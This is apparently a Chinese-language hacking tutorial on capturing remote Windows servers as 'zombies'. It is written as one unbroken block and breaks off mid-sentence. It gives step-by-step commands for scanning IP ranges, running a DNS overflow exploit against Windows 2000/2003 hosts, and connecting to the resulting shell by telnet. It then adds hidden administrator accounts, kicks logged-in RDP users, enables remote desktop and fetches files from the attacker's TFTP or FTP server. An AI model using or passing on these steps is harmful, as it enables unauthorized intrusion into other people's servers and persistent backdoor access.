简简单单抓到服务器肉鸡.doc

用远程桌面连接器进入肉鸡连上肉鸡进入肉鸡用S扫描器扫肉鸡S扫有SYN扫和TCP扫SYN 扫很快,但是只能NT和2000和2003上扫不能在XP上扫而且扫描的结果不好格试S SYN 起始IP 终止IP 端口 /SAVE(把扫到的IP保存为RESULT.TXT文件)TCP扫描但是能在NT,XP,2000,2003扫而且扫到的IP很好.S TCP 起始IP 终止IP 端口 线程数(0-1024) /SAVE(把扫到的IP保存为RESULT.TXT文件)扫到的结果保存为relult.tx打开RESULT就是扫到的IP用工具整理整理后的IP在DNS.TXT里面这就是怎么用S扫描扫端口可以扫3389 ,4433.135等等用DNS扫肉鸡先用S扫描器扫到有用的开了53的IP查询IP用纯真IP数据库查询我们查英国保存好以后就可以扫IP了我们用TCP扫描首先先把刚才的英国IP复制好然后打开TCP删除” 请填写纯真IP数据段!_”然后把复制的IP贴上去并保存退出TXT文件按ENTER开始扫扫描完成后结果自动存为dns.txt打开已经整理好了然后就可以用我们的工具进行溢出出处理了表示17可以溢出他的端口是1066是2003的系统经过溢出可以连接了telnet ip 1100如果成功的话就进入对方的system32下没有成功如果拿到一个IP要看他可不可以溢出只要DNS -S IP就可以了比如这个IP28那就用dns s 28可以溢出1109为端口2000的系统然后可以进行溢出dns t2000all 28 1109可以看能不能连上telnet 28 1100 成功了遇到2000的都用telnet t2000all ip 11002003的大多用telnet t2003engl ip 1100只有几个国家的特殊chs中国 cht台湾jpn日本kor韩国接着看28用net user 可以看有那些用户在里面用net localgroup administrators可以看那些是有管理员权限的用户administratorxiake$这些都有管理员权限的用户只有这样的用户才能进入肉鸡建立用户的方法net user 用户名 密码 /add建立如 用户名为qq 密码为123的用户net user qq 123 /add没有成功提示密码太短了所以般来说密码要用字母和特殊符号组成容易成功如:q*123456net user qq q*123456 /add成功了下一回就把它变成管理员用户用net localgroup administrators qq /add可以了再用net localgroup administrators 看看有没有有了当然也可以在DOS下建立隐藏的用户只要在用户名后面加$就可以qq$这个我们建立net user qq$ q*123456 /addnet localgroup administrators qq$ /add用net user 看不到的只能看到QQ这个用户对大多国家的都用net user 用户名 密码 /addnet locagroup administrators 用户名/ add来建立用户但对于欧洲的一些国家如法国意大利德国要把administrators变成administratoren administrateurs administratorzy administratores 这些我们也可以看有那些用户进到肉鸡上用query user 有两个root不是远程进的.guset 是远程进的 rdp-tcp#14这样的才是远程进的如果要T掉它只要logoff rdp-tcp#14就可以了建立了用户以后当然要进肉鸡了但有的肉鸡没有开3389我们就要帮它开了3389才能进只要传一个3389上去运行一下就可以了可以通过TFTP和FTP来传当然也可以把批处理复制上去就个方法最快tftp的使用方法TFTP I TFTP服务器IP GET 要上传的文件ftp的使用: ftp v ip(FTP服务器的IP地址)然后写上用户名接着确定,再输入密码就可